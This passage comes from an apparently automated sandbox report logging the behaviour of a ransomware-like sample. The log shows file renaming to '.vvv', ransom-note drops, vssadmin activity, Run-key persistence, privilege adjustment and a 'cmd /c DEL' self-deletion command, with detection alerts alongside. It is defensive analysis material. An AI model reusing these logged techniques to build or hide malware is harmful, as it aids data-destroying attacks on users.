  6717. C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+sia.html
  6718.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6719.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6720.     328     9372
  6721. File   
  6722. Created
  6723.    
  6724. C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+sia.txt
  6725.     328      
  6726. File   
  6727. Close
  6728.    
  6729. C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\how_recover+sia.txt
  6730.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6731.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6732.     328     2639
  6733. 1014 Repeated items skipped
  6734. API Call   
  6735.    
  6736.  API Name:  Sleep   Address:  0x0041f00b
  6737.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  6738.     328      
  6739. File   
  6740. Rename
  6741.    
  6742. Old Name:   C:\Program Files\Java\jre1.7.0_0\lib\jvm.hprof.txt
  6743. New Name:   C:\Program Files\Java\jre1.7.0_0\lib\jvm.hprof.txt.vvv
  6744.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6745.     328     4654
  6746. API Call   
  6747.    
  6748.  API Name:  Sleep   Address:  0x0041f00b
  6749.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  6750.     328      
  6751. Malicious  Alert   
  6752. High Repeated Sleep Calls
  6753.    
  6754. Message:   High repeated sleep calls    Detail:   High repeated number of sleep calls  
  6755.              
  6756. 591 Repeated items skipped
  6757. API Call   
  6758.    
  6759.  API Name:  ShellExecuteW   Address:  0x0041f74d
  6760.  Params:  [0x0, open, C:\Users\Administrator\Desktop\Howto_RESTORE_FILES
  6761.   .txt, NULL, NULL, 1]
  6762.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  Shell32.dll
  6763.     328      
  6764. Process
  6765. Opened
  6766.    
  6767.  
  6768. Target:   N\AB    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  6769.    
  6770. 2232
  6771. 328
  6772.          
  6773. Process
  6774. Started
  6775.    
  6776. C:\Windows\SysWOW64\notepad.exe
  6777.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6778.  Command Line:  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.txt
  6779. MD5:  d378bffb70923139d6a4f546864aa61c
  6780.     2232    328  
  6781. Malicious  Alert   
  6782. Decoy  Activity
  6783.    
  6784. Message:   Decoy Application Started    Detail:   Decoy Application Started  
  6785.              
  6786. Malicious  Alert   
  6787. Misc  Anom
  6788.    
  6789. Message:   Suspicious Decoy Activity    Detail:   Suspicious Decoy Activity  
  6790.              
  6791. 52 Repeated items skipped
  6792. Process
  6793. Terminated
  6794.    
  6795. C:\Windows\System32\vssadmin.exe
  6796.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6797.  Command Line:  N/A
  6798.     2340    328  
  6799. Process
  6800. Terminated
  6801.    
  6802. C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6803.  Parentname:  C:\Users\Administrator\AppData\Local\Temp\73.exe
  6804.  Command Line:  N/A
  6805.     328 2252     
  6806. Malicious  Alert   
  6807. Suspicious  Persistance  Activity
  6808.    
  6809. Message:   New file in AppData added to Run regkey    Detail:   Process drops a file in AppData then adds to Run regkey  
  6810.              
  6811. Malicious  Alert   
  6812. Misc  Anom
  6813.    
  6814. Message:   Suspicious Persistence Activity    Detail:   Suspicious Persistence Activity  
  6815.              
  6816. Malicious  Alert   
  6817. Generic  Anomalous  Activity
  6818.    
  6819. Message:   Process Opening explorer    Detail:   Process Opening Explorer  
  6820.              
  6821. Malicious  Alert   
  6822. Misc  Anom
  6823.    
  6824. Message:   Process Open with Root process deleted    Detail:   Process deleting itself  
  6825.              
  6826. Malicious  Alert   
  6827. Suspicious  Persistance  Activity
  6828.    
  6829. Message:   Startup services added for file    Detail:   Process adding itself (non-DLL) to windows startup areas for file  
  6830.              
  6831. OS Change Detail   (version: 1.1290)     | Items: 961  | OS Info: Microsoft WindowsXP 32-bit 5.1 sp3 15.0826   Top
  6832. Type    Mode/Class  Details (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.)  Process ID  Parent ID   File Size
  6833. Analysis   
  6834. Malware
  6835.    
  6836.              
  6837. Application
  6838.    
  6839.              
  6840. 3 Repeated items skipped
  6841. Config  Update 
  6842.    
  6843.              
  6844. Uac
  6845. Service
  6846.    
  6847. Telephony
  6848.              
  6849. Uac
  6850. Service
  6851.    
  6852. Remote Access Connection Manager
  6853.              
  6854. Process
  6855. Started
  6856.    
  6857. C:\Documents and Settings\admin\Local Settings\Temp\73.exe
  6858.  Parentname:  C:\WINDOWS\explorer.exe
  6859.  Command Line:  "C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe"
  6860.  MD5:  446071be407efeb4e0d7c83bb504774a
  6861.  SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  6862.     1240    2684    400384
  6863. File   
  6864. Failed
  6865.    
  6866. C:\DOCUME~1\admin\LOCALS~1\Temp\LPK.DLL
  6867.     1240         
  6868. File   
  6869. Failed
  6870.    
  6871. C:\DOCUME~1\admin\LOCALS~1\Temp\USP10.dll
  6872.     1240         
  6873. Regkey 
  6874. Queryvalue
  6875.    
  6876. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  6877.     1240         
  6878. File   
  6879. Failed
  6880.    
  6881. C:\DOCUME~1\admin\LOCALS~1\Temp\a.Config
  6882.     1240         
  6883. API Call   
  6884.    
  6885.   API Name:  GetSystemDirectoryA   Address:  0x77121df1
  6886.   Params:  [0x771a1290, 260]
  6887.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6888.     1240         
  6889. Process
  6890. Duplicate  Opened
  6891.    
  6892.  
  6893. Target:   C:\Documents and Settings\admin\Local Settings\Temp\73.exe    Source:   C:\Documents and Settings\admin\Local Settings\Temp\73.exe  
  6894.    
  6895. 1240
  6896. 1240
  6897. 1240
  6898. 1240
  6899.          
  6900. API Call   
  6901.    
  6902.   API Name:  GetSystemTime   Address:  0x63004857
  6903.   Params:  [0x128c3c]
  6904.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6905.     1240         
  6906. API Call   
  6907.    
  6908.   API Name:  SystemTimeToFileTime   Address:  0x63004862
  6909.   Params:  [0x128c3c, 0x630b19f8]
  6910.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6911.     1240         
  6912. Regkey 
  6913. Added
  6914.    
  6915. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersio
  6916.    n\Internet Settings
  6917.     1240         
  6918. Regkey 
  6919. Added
  6920.    
  6921. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  6922.    n\Explorer\User Shell Folders
  6923.     1240         
  6924. Regkey 
  6925. Added
  6926.    
  6927. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  6928.    n\Explorer\Shell Folders
  6929.     1240         
  6930. Regkey 
  6931. Setval
  6932.    
  6933. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  6934.    n\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
  6935.     1240         
  6936. API Call   
  6937.    
  6938.  API Name:  Sleep   Address:  0x0042232d
  6939.  Params:  [15]
  6940.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6941.     1240         
  6942. API Call   
  6943.    
  6944.  API Name:  Sleep   Address:  0x0042232d
  6945.  Params:  [15]
  6946.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6947.     1240         
  6948. 8 Repeated items skipped
  6949. File   
  6950. Failed
  6951.    
  6952. C:\DOCUME~1\admin\LOCALS~1\Temp\CLBCATQ.DLL
  6953.     1240         
  6954. File   
  6955. Failed
  6956.    
  6957. C:\DOCUME~1\admin\LOCALS~1\Temp\COMRes.dll
  6958.     1240         
  6959. API Call   
  6960.    
  6961.  API Name:  GetSystemDirectoryW   Address:  0x76fd7ee4
  6962.  Params:  [0x77043650, 261]
  6963.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6964.     1240         
  6965. Mutex  
  6966.    
  6967. \BaseNamedObjects\AMResourceMutex2
  6968.     1240         
  6969. Mutex  
  6970.    
  6971. \BaseNamedObjects\VideoRenderer
  6972.     1240         
  6973. API Call   
  6974.    
  6975.  API Name:  GetSystemDirectoryA   Address:  0x74723c7f
  6976.  Params:  [0xfcf568, 261]
  6977.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6978.     1240         
  6979. API Call   
  6980.    
  6981.  API Name:  GetSystemDirectoryA   Address:  0x74723c7f
  6982.  Params:  [0xfcf570, 261]
  6983.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  6984.     1240         
  6985. Mutex  
  6986.    
  6987. \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  6988.     1240         
  6989. Mutex  
  6990.    
  6991. \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  6992.     1240         
  6993. Mutex  
  6994.    
  6995. \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  6996.     1240         
  6997. Mutex  
  6998.    
  6999. \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7000.     1240         
  7001. Mutex  
  7002.    
  7003. \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7004.     1240         
  7005. API Call   
  7006.    
  7007.  API Name:  GetSystemDirectoryA   Address:  0x74723c7f
  7008.  Params:  [0xfcf4bc, 261]
  7009.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7010.     1240         
  7011. Mutex  
  7012.    
  7013. \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-1409082233-688789844-725345543-1003MUTEX.Defau
  7014.   ltS-1-5-21-1409082233-688789844-725345543-1003
  7015.     1240         
  7016. API Call   
  7017.    
  7018.  API Name:  SetWindowsHookExA   Address:  0x7473097c
  7019.  Params:  [2, 0x747307c3, 0x74720000, 736]
  7020.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  user32.dll
  7021.     1240         
  7022. API Call   
  7023.    
  7024.  API Name:  SetWindowsHookExA   Address:  0x7473099a
  7025.  Params:  [7, 0x747304cd, 0x74720000, 736]
  7026.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  user32.dll
  7027.     1240         
  7028. API Call   
  7029.    
  7030.  API Name:  GetSystemDirectoryW   Address:  0x763982be
  7031.  Params:  [0xfcef98, 260]
  7032.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7033.     1240         
  7034. API Call   
  7035.    
  7036.  API Name:  GetSystemDirectoryW   Address:  0x763982be
  7037.  Params:  [0xfcf548, 260]
  7038.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7039.     1240         
  7040. API Call   
  7041.    
  7042.  API Name:  GetSystemDirectoryA   Address:  0x755dd289
  7043.  Params:  [0xfceb8c, 261]
  7044.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7045.     1240         
  7046. API Call   
  7047.    
  7048.  API Name:  GetSystemDirectoryA   Address:  0x755dd289
  7049.  Params:  [0xfcf630, 261]
  7050.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7051.     1240         
  7052. API Call   
  7053.    
  7054.  API Name:  GetSystemDirectoryW   Address:  0x763982be
  7055.  Params:  [0xfcf1b8, 260]
  7056.  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7057.     1240         
  7058. File   
  7059. Failed
  7060.    
  7061. C:\DOCUME~1\admin\LOCALS~1\Temp\MSVFW32.dll
  7062.     1240         
  7063. Regkey 
  7064. Added
  7065.    
  7066. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7067.   n\Explorer\Shell Folders
  7068.     1240         
  7069. Regkey 
  7070. Setval
  7071.    
  7072. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7073.   n\Explorer\Shell Folders\"CD Burning" = C:\Documents and Settings\admin\Local Settings\Applicatio
  7074.    n Data\Microsoft\CD Burning
  7075.     1240         
  7076. Regkey 
  7077. Added
  7078.    
  7079. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7080.    n\Explorer\User Shell Folders
  7081.     1240         
  7082. Folder 
  7083. Open
  7084.    
  7085. C:\Documents and Settings\admin\My Documents
  7086.     1240         
  7087. Regkey 
  7088. Added
  7089.    
  7090. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7091.    n\Explorer\Shell Folders
  7092.     1240         
  7093. Regkey 
  7094. Setval
  7095.    
  7096. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7097.    n\Explorer\Shell Folders\"Personal" = C:\Documents and Settings\admin\My Documents
  7098.     1240         
  7099. Regkey 
  7100. Added
  7101.    
  7102. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7103.   n\Explorer\User Shell Folders
  7104.     1240         
  7105. Regkey 
  7106. Added
  7107.    
  7108. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7109.   n\Explorer\Shell Folders
  7110.     1240         
  7111. Regkey 
  7112. Setval
  7113.    
  7114. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7115.   n\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
  7116.     1240         
  7117. Regkey 
  7118. Added
  7119.    
  7120. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  7121.     1240         
  7122. Regkey 
  7123. Added
  7124.    
  7125. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  7126.     1240         
  7127. Regkey 
  7128. Setval
  7129.    
  7130. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Desktop"
  7131.   = C:\Documents and Settings\All Users\Desktop
  7132.     1240         
  7133. Regkey 
  7134. Added
  7135.    
  7136. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  7137.     1240         
  7138. Regkey 
  7139. Setval
  7140.    
  7141. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData"
  7142.    = C:\Documents and Settings\All Users\Application Data
  7143.     1240         
  7144. API Call   
  7145.    
  7146.   API Name:  NtAdjustPrivilegesToken   Address:  0x77ddf01a
  7147.   Params:  [SeDebugPrivilege, Enabled]
  7148.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  ntdll.dll
  7149.     1240         
  7150. API Call   
  7151.    
  7152.   API Name:  GetTokenInformation   Address:  0x0041e934
  7153.   Params:  [0x1c4, 0x19]
  7154.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  advapi32.dll
  7155.     1240         
  7156. API Call   
  7157.    
  7158.   API Name:  Sleep   Address:  0x0042232d
  7159.   Params:  [15]
  7160.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7161.     1240         
  7162. API Call   
  7163.    
  7164.   API Name:  Sleep   Address:  0x0042232d
  7165.   Params:  [15]
  7166.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7167.     1240         
  7168. 4 Repeated items skipped
  7169. File   
  7170. Failed
  7171.    
  7172. C:\Documents and Settings\admin\Application Data\73.exe
  7173.     1240         
  7174. File   
  7175. Created
  7176.    
  7177. C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  7178.     1240         
  7179. Malicious  Alert   
  7180. Malicious  Directory
  7181.    
  7182. Message:   Executable file created in suspicious location    Detail:   Process creating executable file in suspicious location  
  7183.              
  7184. Malicious  Alert   
  7185. Misc  Anom
  7186.    
  7187. Message:   Generic Trojan Behavior    Detail:   Generic Trojan Behavior  
  7188.              
  7189. File   
  7190. Date  Change
  7191.    
  7192. C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  7193.     1240        400384
  7194. File   
  7195. Close
  7196.    
  7197. C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  7198.   MD5:  446071be407efeb4e0d7c83bb504774a
  7199.   SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  7200.     1240        400384
  7201. File   
  7202. Failed
  7203.    
  7204. C:\Documents
  7205.     1240         
  7206. File   
  7207. Failed
  7208.    
  7209. C:\Documents.exe
  7210.     1240         
  7211. File   
  7212. Failed
  7213.    
  7214. C:\Documents and
  7215.     1240         
  7216. File   
  7217. Failed
  7218.    
  7219. C:\Documents and.exe
  7220.     1240         
  7221. File   
  7222. Failed
  7223.    
  7224. C:\Documents and Settings\admin\Application
  7225.     1240         
  7226. File   
  7227. Failed
  7228.    
  7229. C:\Documents and Settings\admin\Application.exe
  7230.     1240         
  7231. Process
  7232. Started
  7233.    
  7234. C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  7235.   Parentname:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe
  7236.   Command Line:  "C:\Documents and Settings\admin\Application Data\ignmy-a.exe"
  7237.   MD5:  446071be407efeb4e0d7c83bb504774a
  7238.   SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  7239.     828 1240    400384
  7240. Malicious  Alert   
  7241. Process  Cloned
  7242.    
  7243. Message:   Process clones and starts itself    Detail:   Process clones and starts itself  
  7244.              
  7245. API Call   
  7246.    
  7247.   API Name:  ShellExecuteW   Address:  0x0041f88d
  7248.   Params:  [0x0, NULL, C:\WINDOWS\system32\cmd.exe, /c DEL C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe, NULL, 0]
  7249.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  Shell32.dll
  7250.     1240         
  7251. Malicious  Alert   
  7252. Generic  Anomalous  Activity
  7253.    
  7254. Message:   Hidden ShellExecute call made    Detail:   Hidden ShellExecute call made  
  7255.              
  7256. File   
  7257. Failed
  7258.    
  7259. C:\DOCUME~1\admin\LOCALS~1\Temp\netapi32.dll
  7260.     1240         
  7261. File   
  7262. Failed
  7263.    
  7264. C:\DOCUME~1\admin\LOCALS~1\Temp\SETUPAPI.dll
  7265.     1240         
  7266. File   
  7267. Failed
  7268.    
  7269. C:\Documents and Settings\admin\Application Data\LPK.DLL
  7270.     828      
  7271. File   
  7272. Failed
  7273.    
  7274. C:\Documents and Settings\admin\Application Data\USP10.dll
  7275.     828      
  7276. Regkey 
  7277. Queryvalue
  7278.    
  7279. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  7280.     1240         
  7281. Regkey 
  7282. Setval
  7283.    
  7284. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7285.   n\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
  7286.     1240         
  7287. Regkey 
  7288. Setval
  7289.    
  7290. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7291.    n\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
  7292.     1240         
  7293. Regkey 
  7294. Queryvalue
  7295.    
  7296. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  7297.     828      
  7298. Regkey 
  7299. Added
  7300.    
  7301. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  7302.     1240         
  7303. Regkey 
  7304. Setval
  7305.    
  7306. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Documents
  7307.    " = C:\Documents and Settings\All Users\Documents
  7308.     1240         
  7309. Mutex  
  7310.    
  7311. \BaseNamedObjects\ZonesCounterMutex
  7312.     1240         
  7313. Mutex  
  7314.    
  7315. \BaseNamedObjects\ZoneAttributeCacheCounterMutex
  7316.     1240         
  7317. Mutex  
  7318.    
  7319. \BaseNamedObjects\ZonesCacheCounterMutex
  7320.     1240         
  7321. Regkey 
  7322. Setval
  7323.    
  7324. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7325.   n\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
  7326.     1240         
  7327. Regkey 
  7328. Setval
  7329.    
  7330. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7331.    n\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
  7332.     1240         
  7333. Regkey 
  7334. Setval
  7335.    
  7336. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7337.   n\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
  7338.     1240         
  7339. Regkey 
  7340. Setval
  7341.    
  7342. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7343.    n\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  7344.     1240         
  7345. Mutex  
  7346.    
  7347. \BaseNamedObjects\ZoneAttributeCacheCounterMutex
  7348.     1240         
  7349. Mutex  
  7350.    
  7351. \BaseNamedObjects\ZonesLockedCacheCounterMutex
  7352.     1240         
  7353. Regkey 
  7354. Setval
  7355.    
  7356. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7357.   n\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
  7358.     1240         
  7359. Regkey 
  7360. Setval
  7361.    
  7362. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7363.    n\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
  7364.     1240         
  7365. Regkey 
  7366. Setval
  7367.    
  7368. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7369.   n\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
  7370.     1240         
  7371. Regkey 
  7372. Setval
  7373.    
  7374. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7375.    n\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  7376.     1240         
  7377. Regkey 
  7378. Added
  7379.    
  7380. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7381.   n\Explorer\Shell Folders
  7382.     1240         
  7383. Regkey 
  7384. Setval
  7385.    
  7386. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7387.   n\Explorer\Shell Folders\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Inter
  7388.    net Files
  7389.     1240         
  7390. Regkey 
  7391. Added
  7392.    
  7393. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7394.    n\Explorer\User Shell Folders
  7395.     1240         
  7396. Folder 
  7397. Open
  7398.    
  7399. C:\Documents and Settings\admin\Cookies
  7400.     1240         
  7401. Regkey 
  7402. Added
  7403.    
  7404. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7405.    n\Explorer\Shell Folders
  7406.     1240         
  7407. Regkey 
  7408. Setval
  7409.    
  7410. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7411.    n\Explorer\Shell Folders\"Cookies" = C:\Documents and Settings\admin\Cookies
  7412.     1240         
  7413. File   
  7414. Failed
  7415.    
  7416. C:\DOCUME~1\admin\LOCALS~1\Temp\a.Config
  7417.     828      
  7418. API Call   
  7419.    
  7420.  API Name:  GetSystemDirectoryA   Address:  0x77121df1
  7421.  Params:  [0x771a1290, 260]
  7422.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7423.     828      
  7424. Process
  7425. Duplicate  Opened
  7426.    
  7427.  
  7428. Target:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe    Source:   C:\Documents and Settings\admin\Application Data\ignmy-a.exe  
  7429.    
  7430. 828
  7431. 828
  7432. 828
  7433. 828
  7434.          
  7435. API Call   
  7436.    
  7437.  API Name:  GetSystemTime   Address:  0x63004857
  7438.  Params:  [0x128c3c]
  7439.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7440.     828      
  7441. API Call   
  7442.    
  7443.  API Name:  SystemTimeToFileTime   Address:  0x63004862
  7444.  Params:  [0x128c3c, 0x630b19f8]
  7445.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7446.     828      
  7447. Regkey 
  7448. Added
  7449.    
  7450. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows\CurrentVersio
  7451.   n\Internet Settings
  7452.     828      
  7453. Regkey 
  7454. Added
  7455.    
  7456. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7457.   n\Explorer\User Shell Folders
  7458.     828      
  7459. Regkey 
  7460. Added
  7461.    
  7462. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7463.   n\Explorer\Shell Folders
  7464.     828      
  7465. Regkey 
  7466. Setval
  7467.    
  7468. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7469.   n\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
  7470.     828      
  7471. API Call   
  7472.    
  7473.   API Name:  Sleep   Address:  0x0042232d
  7474.   Params:  [15]
  7475.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7476.     828      
  7477. API Call   
  7478.    
  7479.   API Name:  Sleep   Address:  0x0042232d
  7480.   Params:  [15]
  7481.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7482.     828      
  7483. Process
  7484. Started
  7485.    
  7486. C:\WINDOWS\system32\cmd.exe
  7487.   Parentname:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe
  7488.   Command Line:  "C:\WINDOWS\system32\cmd.exe" /c DEL C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
  7489.   MD5:  6d778e0f95447e6546553eeea709d03c
  7490.   SHA1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
  7491.     1268    1240    389120
  7492. API Call   
  7493.    
  7494.   API Name:  GetSystemDirectoryW   Address:  0x755dd323
  7495.   Params:  [0x12fab4, 261]
  7496.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7497.     1240         
  7498. API Call   
  7499.    
  7500.   API Name:  GetSystemDirectoryW   Address:  0x755dd323
  7501.   Params:  [0x12fab4, 261]
  7502.   Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\73.exe   DLL Name:  kernel32.dll
  7503.     1240         
  7504. Mutex  
  7505.    
  7506. \BaseNamedObjects\VideoRenderer
  7507.     1240         
  7508. API Call   
  7509.    
  7510.   API Name:  Sleep   Address:  0x0042232d
  7511.   Params:  [15]
  7512.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7513.     828      
  7514. API Call   
  7515.    
  7516.   API Name:  Sleep   Address:  0x0042232d
  7517.   Params:  [15]
  7518.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7519.     828      
  7520. 3 Repeated items skipped
  7521. Mutex  
